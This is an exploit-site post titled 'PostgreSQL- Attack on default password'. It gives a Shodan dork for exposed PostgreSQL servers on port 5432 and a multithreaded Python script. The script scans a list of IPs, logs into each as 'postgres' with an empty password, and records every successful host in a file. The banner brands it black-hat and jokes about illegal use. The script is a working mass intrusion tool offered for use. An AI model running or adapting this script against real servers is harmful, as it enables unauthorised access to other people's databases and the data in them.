PostgreSQL- Attack on default password

2019.04.11

kill_the_net (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: port:5432 PostgreSQL country:"##ANY COUNTRY##" FATAL: database

##########################
PostgreSQL- Attack on default password
##########################

An easy way to get access to database without any brute force attack.
[+]- Scan ips on port 5432 or Dork on Shodan.
[+]-Exploit:
user = "postgres"
password = ""
port = "5432"
database = "postgres"
and connect to databse.

##########################
For mass scaning put your ip's on text file and run the script :)
##########################
USAGE : python script.py ips.txt
----------------------------------------------

# -*- coding: utf-8 -*
#!/usr/bin/python
#####################################
##KILL THE NET##
#### PS: CHANGE Your Threads pool on line 105 to make script more faster :)
##############[LIBS]###################
import os, sys, codecs, random, socket			
from multiprocessing.dummy import Pool
import time					     	
from time import time as timer		   		
from platform import system						
from colorama import init
try:
    import psycopg2
except ImportError:
    print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
    print('[-] pip install psycopg2')
    print('[+] you need to install psycopg2 module (For MacOS try with brew)')
    sys.exit()

init(autoreset=True)
##########################################################################################
ktnred = '\033[31m'
ktngreen = '\033[32m'
ktn3yell = '\033[33m'
ktn4blue = '\033[34m'
ktn5purp = '\033[35m'
ktn6blueblue = '\033[36m'
ktn7grey = '\033[37m'
CEND = '\033[0m'		
#####################################
##########################################################################################
try:
	with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
		ooo = f.read().splitlines()
except IndexError:
	print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listip.txt' + CEND)
	pass
ooo = list((ooo))
##########################################################################################


def checkip(ooo):
	ip = ooo
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.settimeout(5)
	killz = sock.connect_ex((ip,5432))
	if killz == 0:
		print (ktn5purp + '[+]=[ GOOD IP: '+ ip +' ]=[+]' + CEND) 
		connect(ip)
	else:
		print (ktnred + '[+]=[SOORY NOT GOOD IP: ' + ip +' ]=[+]' + CEND)
	pass


def connect(ip):
    try:
        connection = psycopg2.connect(user = "postgres",
                                      password = "",
                                      host = ip,
                                      port = "5432",
                                      database = "postgres")
        cursor = connection.cursor()
        # Print PostgreSQL Connection properties
        print ( connection.get_dsn_parameters(),"\n")
        # Print PostgreSQL version
        cursor.execute("SELECT version();")
        record = cursor.fetchone()
        print("You are connected to - ", record, "\n")
        open('connected-db.txt', 'a').write('=='*5 + '[START]' + '=='*5 + '\n' + '[IP]: '+ ip + '\n'+'[USER: postgres, PASSWORD: NULL, PORT: 5432, DB: postgres]' + '\n' + '=='*5 + '[END]' + '=='*5 + '\n')
    except:
        print ("Error while connecting to PostgreSQL")

##########################################################################################
##########################################################################################
def logo():
	clear = "\x1b[0m"
	colors = [36, 32, 34, 35, 31, 37]
	x = ''' 
				 FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_ 
<-.(`-')  _                      (`-')      (`-').-> (`-')  _<-. (`-')_  (`-')  _(`-')      
 __( OO) (_)      <-.      <-.   ( OO).->   (OO )__  ( OO).-/   \( OO) ) ( OO).-/( OO).->   
'-'. ,--.,-(`-'),--. )   ,--. )  /    '._  ,--. ,'-'(,------.,--./ ,--/ (,------./    '._   
|  .'   /| ( OO)|  (`-') |  (`-')|'--...__)|  | |  | |  .---'|   \ |  |  |  .---'|'--...__) 
|      /)|  |  )|  |OO ) |  |OO )`--.  .--'|  `-'  |(|  '--. |  . '|  |)(|  '--. `--.  .--' 
|  .   '(|  |_/(|  '__ |(|  '__ |   |  |   |  .-.  | |  .--' |  |\    |  |  .--'    |  |    
|  |\   \|  |'->|     |' |     |'   |  |   |  | |  | |  `---.|  | \   |  |  `---.   |  |    
`--' '--'`--'   `-----'  `-----'    `--'   `--' `--' `------'`--'  `--'  `------'   `--'    
									  KILL THE NET
									 FB: fb/KtN.1990  
			   Note! : We Accept any responsibility for any illegal usage :). '''

	for N, line in enumerate(x.split("\n")):
		sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
		time.sleep(0.05)
		pass


logo()
##########################################################################################
def Main():
	try:
		
		start = timer()
		ThreadPool = Pool(50)
		Threads = ThreadPool.map(checkip, ooo)
		print('TIME TAKE: ' + str(timer() - start) + ' S')
	except:
		pass


if __name__ == '__main__':
	Main()

References:

https://github.com/KTN1990/PostgreSQL--Attack-on-default-password-AUTOEXPLOITING

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PostgreSQL- Attack on default password

Dork: port:5432 PostgreSQL country:"##ANY COUNTRY##" FATAL: database

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.